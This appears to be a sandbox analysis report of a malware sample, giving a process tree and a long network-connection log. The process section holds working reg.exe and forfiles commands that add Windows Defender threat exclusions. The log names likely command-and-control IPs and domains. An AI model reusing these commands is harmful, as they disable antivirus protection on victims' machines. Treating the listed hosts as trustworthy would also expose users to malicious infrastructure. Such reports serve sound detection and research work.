C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\A.I_Run.cmd" "

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c color 0a

C:\Users\Admin\Desktop\a\lordga.exe

"C:\Users\Admin\Desktop\a\lordga.exe"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\Desktop\a\sharonzx.exe

"C:\Users\Admin\Desktop\a\sharonzx.exe"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Users\Admin\Documents\SimpleAdobe\Uq10mZ6Y50tLD3FLTNDwXZl7.exe

C:\Users\Admin\Documents\SimpleAdobe\Uq10mZ6Y50tLD3FLTNDwXZl7.exe

C:\Users\Admin\Documents\SimpleAdobe\PpGVYwDJihEYmqH87mw7EuOG.exe

C:\Users\Admin\Documents\SimpleAdobe\PpGVYwDJihEYmqH87mw7EuOG.exe

C:\Users\Admin\Documents\SimpleAdobe\t2pqAPBSuwFl6sSAWM2YjX_R.exe

C:\Users\Admin\Documents\SimpleAdobe\t2pqAPBSuwFl6sSAWM2YjX_R.exe

C:\Users\Admin\Documents\SimpleAdobe\Whp_pq1B25T5K1tpNYjCRQX3.exe

C:\Users\Admin\Documents\SimpleAdobe\Whp_pq1B25T5K1tpNYjCRQX3.exe

C:\Users\Admin\Documents\SimpleAdobe\X6rimFAB03ZDILkowJQrwUnr.exe

C:\Users\Admin\Documents\SimpleAdobe\X6rimFAB03ZDILkowJQrwUnr.exe

C:\Users\Admin\Documents\SimpleAdobe\dWfWtELoSDtppkC8JesnuFwT.exe

C:\Users\Admin\Documents\SimpleAdobe\dWfWtELoSDtppkC8JesnuFwT.exe

C:\Users\Admin\Documents\SimpleAdobe\EyTp8VCg9xcX9IZgX41O_Eqr.exe

C:\Users\Admin\Documents\SimpleAdobe\EyTp8VCg9xcX9IZgX41O_Eqr.exe

C:\Users\Admin\Documents\SimpleAdobe\tFSalR9d0ypdJ7RD2FuSO3hB.exe

C:\Users\Admin\Documents\SimpleAdobe\tFSalR9d0ypdJ7RD2FuSO3hB.exe

C:\Users\Admin\Documents\SimpleAdobe\fIRVkWVCyaNxlIODausNu2m4.exe

C:\Users\Admin\Documents\SimpleAdobe\fIRVkWVCyaNxlIODausNu2m4.exe

C:\Users\Admin\Documents\SimpleAdobe\V03vUNtASWskmZuu3axIKK9P.exe

C:\Users\Admin\Documents\SimpleAdobe\V03vUNtASWskmZuu3axIKK9P.exe

C:\Users\Admin\Documents\SimpleAdobe\88C0YlDBAi_t211SrcmoHuNV.exe

C:\Users\Admin\Documents\SimpleAdobe\88C0YlDBAi_t211SrcmoHuNV.exe

C:\Users\Admin\Documents\SimpleAdobe\5YWO18trxtU7_Zuk8nsTfG79.exe

C:\Users\Admin\Documents\SimpleAdobe\5YWO18trxtU7_Zuk8nsTfG79.exe

C:\Users\Admin\Pictures\360TS_Setup.exe

"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\is-4I0EP.tmp\PpGVYwDJihEYmqH87mw7EuOG.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4I0EP.tmp\PpGVYwDJihEYmqH87mw7EuOG.tmp" /SL5="$403F8,6582875,54272,C:\Users\Admin\Documents\SimpleAdobe\PpGVYwDJihEYmqH87mw7EuOG.exe"

C:\Users\Admin\Desktop\a\UpdateTool_858.exe

"C:\Users\Admin\Desktop\a\UpdateTool_858.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x414

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 ogs.google.com udp
GB 142.250.187.238:443 ogs.google.com tcp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 clients2.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 kstatic.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 142.250.200.42:443 ajax.googleapis.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 8.8.8.8:53 apps.google.com udp
US 8.8.8.8:53 workspace.google.com udp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 about.google udp
US 8.8.8.8:53 acrobat.adobe.com udp
US 8.8.8.8:53 blogs.autodesk.com udp
US 8.8.8.8:53 cloud.google.com udp
US 8.8.8.8:53 help.salesforce.com udp
US 8.8.8.8:53 marketplace.atlassian.com udp
US 8.8.8.8:53 one.google.com udp
US 8.8.8.8:53 policies.google.com udp
US 8.8.8.8:53 services.google.com udp
US 8.8.8.8:53 slack.com udp
US 8.8.8.8:53 support.google.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 www.docusign.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 84.27.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 240.11.241.35.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 csp.withgoogle.com udp
GB 216.58.212.241:443 csp.withgoogle.com tcp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 241.212.58.216.in-addr.arpa udp
NL 142.250.27.84:443 accounts.google.com udp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.212.202:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
GB 142.250.179.238:443 www.youtube.com udp
GB 142.250.179.238:443 www.youtube.com udp
GB 216.58.212.202:443 content-autofill.googleapis.com udp
GB 142.250.187.238:443 accounts.youtube.com udp
GB 142.250.200.14:443 www.youtube.com udp
US 8.8.8.8:53 lh3.google.com udp
GB 172.217.16.238:443 lh3.google.com tcp
US 8.8.8.8:53 clients6.google.com udp
GB 142.250.187.238:443 clients6.google.com tcp
GB 172.217.16.225:443 lh3.googleusercontent.com udp
US 8.8.8.8:53 drivefrontend-pa.clients6.google.com udp
GB 142.250.180.10:443 drivefrontend-pa.clients6.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
GB 142.250.187.238:443 clients6.google.com udp
GB 142.250.180.10:443 drivefrontend-pa.clients6.google.com udp
US 8.8.8.8:53 waa-pa.clients6.google.com udp
US 8.8.8.8:53 ogads-pa.clients6.google.com udp
GB 216.58.204.74:443 ogads-pa.clients6.google.com tcp
GB 216.58.204.74:443 ogads-pa.clients6.google.com udp
US 8.8.8.8:53 addons-pa.clients6.google.com udp
GB 142.250.180.10:443 drivefrontend-pa.clients6.google.com udp
US 8.8.8.8:53 drive.fife.usercontent.google.com udp
US 8.8.8.8:53 people-pa.clients6.google.com udp
GB 142.250.187.225:443 drive.fife.usercontent.google.com tcp
GB 216.58.212.234:443 people-pa.clients6.google.com tcp
US 8.8.8.8:53 peoplestackwebexperiments-pa.clients6.google.com udp
US 8.8.8.8:53 peoplestack-pa.clients6.google.com udp
GB 172.217.16.234:443 peoplestackwebexperiments-pa.clients6.google.com tcp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
GB 172.217.16.234:443 peoplestackwebexperiments-pa.clients6.google.com udp
GB 142.250.187.225:443 drive.fife.usercontent.google.com udp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 docs.google.com udp
GB 142.250.200.14:443 docs.google.com tcp
US 8.8.8.8:53 contacts.google.com udp
GB 142.250.200.14:443 contacts.google.com tcp
US 8.8.8.8:53 signaler-pa.clients6.google.com udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
NL 142.250.27.84:443 accounts.google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
GB 142.250.200.14:443 contacts.google.com udp
GB 142.250.179.238:443 www.youtube.com udp
GB 142.250.187.238:443 clients6.google.com udp
GB 142.250.200.14:443 contacts.google.com udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
NL 142.250.27.84:443 accounts.google.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 216.239.32.116:443 beacons4.gvt2.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 116.32.239.216.in-addr.arpa udp
GB 142.250.187.238:443 clients6.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
US 192.178.49.163:443 beacons.gvt2.com tcp
IN 172.217.166.3:443 beacons2.gvt2.com tcp
IN 172.217.166.3:443 beacons2.gvt2.com tcp
US 192.178.49.163:443 beacons.gvt2.com udp
US 8.8.8.8:53 163.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 3.166.217.172.in-addr.arpa udp
IN 172.217.166.3:443 beacons2.gvt2.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 44.237.65.238:443 shavar.services.mozilla.com tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 contile.services.mozilla.com udp
N/A 127.0.0.1:50490 tcp
US 8.8.8.8:53 238.65.237.44.in-addr.arpa udp
N/A 127.0.0.1:50496 tcp
GB 142.250.187.238:443 clients6.google.com udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:80 drive.google.com tcp
GB 142.250.187.238:80 drive.google.com tcp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
GB 142.250.187.238:443 drive.google.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
NL 142.250.27.84:443 accounts.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 kstatic.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 8.8.8.8:53 kstatic.googleusercontent.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 googlehosted.l.googleusercontent.com udp
GB 142.250.179.234:443 ajax.googleapis.com tcp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 googlehosted.l.googleusercontent.com udp
GB 142.250.179.234:443 ajax.googleapis.com udp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com tcp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com tcp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com tcp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com tcp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com tcp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com udp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 accounts.youtube.com udp
GB 142.250.187.238:443 accounts.youtube.com tcp
US 8.8.8.8:53 www3.l.google.com udp
US 8.8.8.8:53 www3.l.google.com udp
GB 142.250.187.238:443 www3.l.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.187.238:443 www3.l.google.com tcp
GB 142.250.187.238:443 www3.l.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
NL 142.250.27.84:443 accounts.google.com tcp
NL 142.250.27.84:443 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com udp
GB 142.250.187.238:443 www3.l.google.com tcp
GB 142.250.187.238:443 www3.l.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.187.238:443 www3.l.google.com tcp
GB 142.250.187.238:443 www3.l.google.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 lh3.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 plus.l.google.com udp
GB 172.217.16.238:443 lh3.google.com tcp
US 8.8.8.8:53 lh2.l.google.com udp
US 8.8.8.8:53 plus.l.google.com udp
US 8.8.8.8:53 lh2.l.google.com udp
GB 142.250.200.14:443 plus.l.google.com udp
GB 172.217.16.238:443 lh2.l.google.com udp
GB 172.217.16.225:443 googlehosted.l.googleusercontent.com udp
US 8.8.8.8:53 clients6.google.com udp
GB 142.250.187.238:443 clients6.google.com tcp
GB 142.250.187.238:443 clients6.google.com tcp
US 8.8.8.8:53 clients.l.google.com udp
US 8.8.8.8:53 clients.l.google.com udp
GB 142.250.187.238:443 clients.l.google.com udp
US 8.8.8.8:53 ogads-pa.clients6.google.com udp
US 8.8.8.8:53 waa-pa.clients6.google.com udp
GB 142.250.187.234:443 ogads-pa.clients6.google.com tcp
US 8.8.8.8:53 ogads-pa.clients6.google.com udp
GB 142.250.187.234:443 ogads-pa.clients6.google.com tcp
GB 142.250.178.10:443 waa-pa.clients6.google.com tcp
US 8.8.8.8:53 waa-pa.clients6.google.com udp
GB 142.250.178.10:443 waa-pa.clients6.google.com tcp
GB 142.250.187.234:443 ogads-pa.clients6.google.com udp
GB 142.250.178.10:443 waa-pa.clients6.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 addons-pa.clients6.google.com udp
GB 142.250.178.10:443 addons-pa.clients6.google.com tcp
US 8.8.8.8:53 addons-pa.clients6.google.com udp
GB 142.250.178.10:443 addons-pa.clients6.google.com tcp
GB 142.250.178.10:443 addons-pa.clients6.google.com udp
US 8.8.8.8:53 drivefrontend-pa.clients6.google.com udp
US 8.8.8.8:53 drive.fife.usercontent.google.com udp
US 8.8.8.8:53 drivefrontend-pa.clients6.google.com udp
GB 216.58.201.106:443 drivefrontend-pa.clients6.google.com tcp
GB 216.58.201.106:443 drivefrontend-pa.clients6.google.com tcp
GB 142.250.187.225:443 drive.fife.usercontent.google.com tcp
US 8.8.8.8:53 drive.fife.usercontent.google.com udp
GB 216.58.201.106:443 drivefrontend-pa.clients6.google.com udp
US 8.8.8.8:53 people-pa.clients6.google.com udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
GB 142.250.187.225:443 drive.fife.usercontent.google.com udp
GB 216.58.212.234:443 people-pa.clients6.google.com tcp
US 8.8.8.8:53 people-pa.clients6.google.com udp
US 8.8.8.8:53 peoplestackwebexperiments-pa.clients6.google.com udp
US 8.8.8.8:53 peoplestack-pa.clients6.google.com udp
GB 216.58.212.234:443 people-pa.clients6.google.com udp
GB 142.250.180.10:443 peoplestack-pa.clients6.google.com tcp
GB 142.250.180.10:443 peoplestack-pa.clients6.google.com tcp
US 8.8.8.8:53 peoplestack-pa.clients6.google.com udp
US 8.8.8.8:53 peoplestackwebexperiments-pa.clients6.google.com udp
GB 142.250.180.10:443 peoplestack-pa.clients6.google.com udp
US 8.8.8.8:53 ogs.google.com udp
GB 142.250.187.238:443 ogs.google.com tcp
GB 142.250.187.238:443 ogs.google.com udp
US 8.8.8.8:53 contacts.google.com udp
GB 142.250.200.14:443 contacts.google.com tcp
GB 142.250.200.14:443 contacts.google.com udp
US 8.8.8.8:53 signaler-pa.clients6.google.com udp
GB 216.58.201.106:443 drivefrontend-pa.clients6.google.com udp
US 8.8.8.8:53 signaler-pa.clients6.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
GB 142.250.187.238:443 ogs.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
CN 124.71.81.174:80 tcp
US 8.8.8.8:53 docs.google.com udp
GB 142.250.200.14:443 docs.google.com tcp
US 8.8.8.8:53 docs.google.com udp
US 8.8.8.8:53 docs.google.com udp
GB 142.250.200.14:443 docs.google.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com udp
US 8.8.8.8:53 docs.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.187.238:443 drive.google.com udp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 signaler-pa.clients6.google.com udp
DE 49.13.194.118:80 49.13.194.118 tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 118.194.13.49.in-addr.arpa udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 free.360totalsecurity.com udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 softcatalog.ru udp
GB 216.58.212.202:443 signaler-pa.clients6.google.com udp
RU 88.212.252.98:443 softcatalog.ru tcp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 98.252.212.88.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
IE 54.76.174.118:80 tr.p.360safe.com udp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 iup.360safe.com udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
NL 185.73.125.6:80 185.73.125.6 tcp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 8.8.8.8:53 sd.p.360safe.com udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
GB 99.86.249.29:80 sd.p.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 21.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 29.249.86.99.in-addr.arpa udp
DE 49.13.194.118:53848 tcp
CN 119.91.25.19:8888 tcp
SG 118.194.235.187:50500 tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 187.235.194.118.in-addr.arpa udp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 50.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 pepecasas123.net udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 104.26.4.15:443 db-ip.com tcp
SG 118.194.235.187:50500 tcp
US 8.8.8.8:53 90.205.10.195.in-addr.arpa udp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
RU 91.215.85.135:80 91.215.85.135 tcp
DE 49.13.194.118:53848 tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 135.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 216.58.212.202:443 signaler-pa.clients6.google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
US 104.26.4.15:443 db-ip.com tcp
DE 77.91.77.33:80 77.91.77.33 tcp
US 8.8.8.8:53 33.77.91.77.in-addr.arpa udp
DE 195.10.205.90:4608 pepecasas123.net tcp
EE 45.129.96.86:80 45.129.96.86 tcp
US 8.8.8.8:53 86.96.129.45.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 doggie-services.com udp
FR 5.42.67.23:80 doggie-services.com tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 23.67.42.5.in-addr.arpa udp
DE 49.13.194.118:80 49.13.194.118 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
MD 94.103.188.126:80 94.103.188.126 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.69:80 185.172.128.69 tcp
US 8.8.8.8:53 69.128.172.185.in-addr.arpa udp
DE 185.172.128.69:80 185.172.128.69 tcp
US 8.8.8.8:53 fragmentyperspowp.shop udp
